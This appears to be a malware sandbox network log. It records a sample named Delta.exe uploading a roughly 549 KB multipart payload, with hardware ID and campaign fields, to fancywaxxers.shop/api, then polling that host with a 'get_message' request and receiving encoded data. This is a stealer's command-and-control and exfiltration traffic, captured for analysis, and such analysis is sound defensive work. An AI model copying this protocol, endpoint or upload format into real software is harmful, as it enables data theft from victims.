                                                                                        2024-12-31 16:21:21 UTC1132INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=ci6t4ope86q5eibqoq81aflhav; expires=Sat, 26 Apr 2025 10:08:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZQ3Ov%2FtUrCJ2YSPsPcJgHh725nagCDi1%2FNFfffs2xDpssbiLsE7dusCN1WVPnhye8ZZ5ZveuaPS9PrzPKrYdP%2Bko8LM5aqU4GrNKsXZpeH5dk%2FYRdZc7Pw0nAkNdpcMd1ip9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a271e3572a4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2017&rtt_var=761&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2119&delivery_rate=1432777&cwnd=212&unsent_bytes=0&cid=4a6f67fecb2d087b&ts=462&x=0"
                                                                                        2024-12-31 16:21:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:21:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449736104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:22 UTC283OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=G2X9029E03VFYHYSC
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 549515
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 32 58 39 30 32 39 45 30 33 56 46 59 48 59 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38
                                                                                        Data Ascii: --G2X9029E03VFYHYSCContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--G2X9029E03VFYHYSCContent-Disposition: form-data; name="pid"1--G2X9029E03VFYHYSCContent-Disposition: form-data; name="lid"yau6Na--91451098
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 4a f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65
                                                                                        Data Ascii: J6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 30 ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d
                                                                                        Data Ascii: 01!y>VrRZ'R%0Zo[TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 0d 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26
                                                                                        Data Ascii: 4,*.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 9a 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db
                                                                                        Data Ascii: (Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 94 a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13
                                                                                        Data Ascii: f*H&=z~XV86E|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: d4 ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43
                                                                                        Data Ascii: o7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8C
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: 97 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c
                                                                                        Data Ascii: !%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: c2 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d
                                                                                        Data Ascii: i;Y9.CT~w['@+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~M
                                                                                        2024-12-31 16:21:22 UTC15331OUTData Raw: ed 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7
                                                                                        Data Ascii: 5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{
                                                                                        2024-12-31 16:21:24 UTC1145INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=nau6hi4v9g1nvbj76h2kip3tf3; expires=Sat, 26 Apr 2025 10:08:02 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fec70vtOOmQkApMfuxWGA%2BDzaWmLOdEr%2FB%2F539TLqUlowLrXnxPmc2S5VusbRs3bx%2B%2B1gaR7vQt1EkQACSxSj4PYObj57cS%2BqqdMbxsnNKDIMpVVYhsWg9lbsx4SA%2Brr2UvxTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a2fded21a48-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1959&rtt_var=739&sent=192&recv=568&lost=0&retrans=0&sent_bytes=2844&recv_bytes=551996&delivery_rate=1475492&cwnd=157&unsent_bytes=0&cid=d3a54c5314b1c42c&ts=1607&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449737104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:24 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 86
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:24 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d 26 68 77 69 64 3d 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=yau6Na--914510980&j=&hwid=0227F22DABB37DE680FC103CECFC3A13
                                                                                        2024-12-31 16:21:25 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=5fhf852s8b1uhgolnk2ab5gki4; expires=Sat, 26 Apr 2025 10:08:03 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hgla7GkCdoZNG76pIyKm88%2FZhemZ0CsuvnyqYD%2BAIO%2F9gZop%2B1BdVu94XMDX%2BbxNANhyDmHJAXOXA48YvixpUNHOcDOPw6b0%2F2bP%2FlY0U2p7FuXh3edcVchJaF9wuMtBhYooqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a3d2c83c32e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1673&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1635854&cwnd=178&unsent_bytes=0&cid=36031326661f268a&ts=452&x=0"
                                                                                        2024-12-31 16:21:25 UTC232INData Raw: 33 36 39 38 0d 0a 53 51 54 37 6b 47 70 35 37 4e 31 68 4a 54 4f 75 74 38 47 57 65 55 65 48 72 67 5a 49 69 57 64 6a 6b 50 75 68 62 51 53 2b 45 44 59 53 66 39 6e 32 48 6c 76 57 37 45 30 48 56 6f 79 4e 38 4c 70 62 49 36 57 55 4a 41 2f 4c 4d 69 2f 57 67 5a 55 70 64 4e 45 6c 44 6e 35 48 75 50 46 54 4d 35 79 6f 53 68 4e 57 39 6f 65 6a 72 77 78 79 30 76 39 31 4c 37 34 54 56 50 75 79 79 6a 78 6c 30 53 56 67 48 54 65 32 79 44 6f 4f 6f 37 41 4c 53 31 6e 64 2f 6f 76 6b 53 53 72 71 6d 54 45 34 76 41 45 78 35 73 6d 57 41 56 62 39 61 6e 49 38 4e 34 37 42 41 79 75 75 72 41 74 4e 56 50 6a 30 75 66 56 53 42 72 48 50 53 53 37 47 45 41 54 39 6a 66 49 4d 5a 73 68 6c 57 43 55 39 76 4d 78 46 47 35 6d 4c 4a 47
                                                                                        Data Ascii: 3698SQT7kGp57N1hJTOut8GWeUeHrgZIiWdjkPuhbQS+EDYSf9n2HlvW7E0HVoyN8LpbI6WUJA/LMi/WgZUpdNElDn5HuPFTM5yoShNW9oejrwxy0v91L74TVPuyyjxl0SVgHTe2yDoOo7ALS1nd/ovkSSrqmTE4vAEx5smWAVb9anI8N47BAyuurAtNVPj0ufVSBrHPSS7GEAT9jfIMZshlWCU9vMxFG5mLJG
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 6c 36 34 59 43 6b 6f 7a 30 2f 77 75 6c 33 42 38 38 41 45 75 69 38 39 56 73 33 7a 43 42 34 4c 56 4b 34 32 44 30 32 6a 71 35 58 54 67 75 5a 33 50 6e 31 51 53 54 75 78 30 67 74 76 52 4d 35 38 73 4f 4b 42 53 2f 38 58 33 41 36 53 71 7a 38 45 7a 47 43 6c 54 55 52 64 64 66 78 6c 65 51 49 4d 4c 62 36 4e 53 72 77 45 51 71 68 79 63 6f 70 52 75 78 54 54 42 31 59 31 50 34 66 4b 4a 53 50 4a 31 42 5a 78 38 2f 34 7a 30 6f 47 72 4f 38 77 4b 63 59 42 4c 4f 65 63 7a 41 56 58 33 33 4a 34 4f 48 65 58 35 45 45 6c 77 37 38 58 63 33 62 69 2f 6f 37 75 48 48 4c 45 35 45 4d 50 2b 43 67 6b 30 61 37 74 4b 33 36 4b 52 45 59 6d 4d 63 4f 6e 4b 54 71 4e 35 43 74 56 52 70 69 42 70 4e 35 4a 4a 62 37 62 4d 33 6a 59 46 41 76 79 6a 35 59 47 54 64 56 42 56 79 59 77 6e 74 59 37 43 72 53 4e 42
                                                                                        Data Ascii: l64YCkoz0/wul3B88AEui89Vs3zCB4LVK42D02jq5XTguZ3Pn1QSTux0gtvRM58sOKBS/8X3A6Sqz8EzGClTURddfxleQIMLb6NSrwEQqhycopRuxTTB1Y1P4fKJSPJ1BZx8/4z0oGrO8wKcYBLOeczAVX33J4OHeX5EElw78Xc3bi/o7uHHLE5EMP+Cgk0a7tK36KREYmMcOnKTqN5CtVRpiBpN5JJb7bM3jYFAvyj5YGTdVBVyYwntY7CrSNB
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 43 72 2f 70 41 41 4e 75 42 5a 44 33 66 49 69 2f 5a 74 4a 59 49 4d 66 31 61 63 77 35 31 74 4e 63 6f 4c 4b 43 62 47 78 46 33 33 74 6a 30 72 6b 34 45 78 4d 38 2f 41 76 6b 53 53 4b 61 65 2b 56 31 6d 68 32 55 44 48 46 57 49 39 31 30 4e 32 37 59 6f 54 6d 4c 50 32 50 58 50 50 78 62 30 39 6c 59 76 78 67 6f 4a 2f 6f 48 53 4a 45 37 4d 49 46 73 6b 4d 38 7a 67 58 78 2b 2b 71 31 4d 53 58 2f 7a 30 75 4e 49 4d 64 50 4c 2f 62 78 72 4c 46 67 6e 34 6e 50 63 75 66 4e 30 37 64 33 39 6c 74 50 59 6c 44 6f 75 77 46 33 5a 53 7a 4d 47 30 2b 42 56 2b 77 50 49 70 4b 76 77 78 4a 74 79 79 37 6c 70 68 69 31 4e 38 44 45 4f 4b 33 79 30 37 75 5a 45 6e 58 77 66 71 78 36 36 6a 51 58 44 45 37 57 64 78 77 78 63 57 75 38 33 45 4e 54 54 63 4b 55 4e 38 55 61 72 6a 44 55 36 59 36 67 70 73 57 50
                                                                                        Data Ascii: Cr/pAANuBZD3fIi/ZtJYIMf1acw51tNcoLKCbGxF33tj0rk4ExM8/AvkSSKae+V1mh2UDHFWI910N27YoTmLP2PXPPxb09lYvxgoJ/oHSJE7MIFskM8zgXx++q1MSX/z0uNIMdPL/bxrLFgn4nPcufN07d39ltPYlDouwF3ZSzMG0+BV+wPIpKvwxJtyy7lphi1N8DEOK3y07uZEnXwfqx66jQXDE7WdxwxcWu83ENTTcKUN8UarjDU6Y6gpsWP
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 45 53 48 49 32 57 45 6b 33 43 6b 62 30 37 50 4a 44 6a 66 4b 4a 41 45 68 4c 36 33 56 4a 6a 69 75 6d 69 39 71 5a 65 58 61 6f 4e 41 58 46 4b 7a 63 4e 6e 37 49 4d 56 44 33 6c 4e 4e 65 63 66 39 44 5a 53 35 32 71 66 67 2b 4e 6f 43 74 4f 58 55 46 68 64 57 4c 38 77 38 69 73 4f 67 32 44 66 74 51 46 66 79 6a 35 6a 74 53 38 6b 4e 54 66 6c 32 35 39 51 59 78 6f 71 67 69 63 6d 62 69 37 61 53 6d 54 77 6a 46 6d 6b 55 59 77 77 45 2f 76 36 69 58 57 31 33 73 57 57 51 2f 62 49 72 30 44 54 6a 64 73 79 64 43 51 50 32 4f 36 71 41 41 42 64 75 42 63 79 72 76 50 54 4c 6a 6f 2b 31 64 56 63 74 43 63 41 4e 4d 6e 39 38 59 50 74 79 56 55 47 42 62 37 50 6d 49 2f 46 49 4a 34 38 4d 74 50 39 73 67 4c 2b 71 50 39 69 56 44 2b 6b 59 50 66 47 69 34 6f 6a 49 56 33 61 77 45 53 77 50 50 6a 34 6a
                                                                                        Data Ascii: ESHI2WEk3Ckb07PJDjfKJAEhL63VJjiumi9qZeXaoNAXFKzcNn7IMVD3lNNecf9DZS52qfg+NoCtOXUFhdWL8w8isOg2DftQFfyj5jtS8kNTfl259QYxoqgicmbi7aSmTwjFmkUYwwE/v6iXW13sWWQ/bIr0DTjdsydCQP2O6qAABduBcyrvPTLjo+1dVctCcANMn98YPtyVUGBb7PmI/FIJ48MtP9sgL+qP9iVD+kYPfGi4ojIV3awESwPPj4j
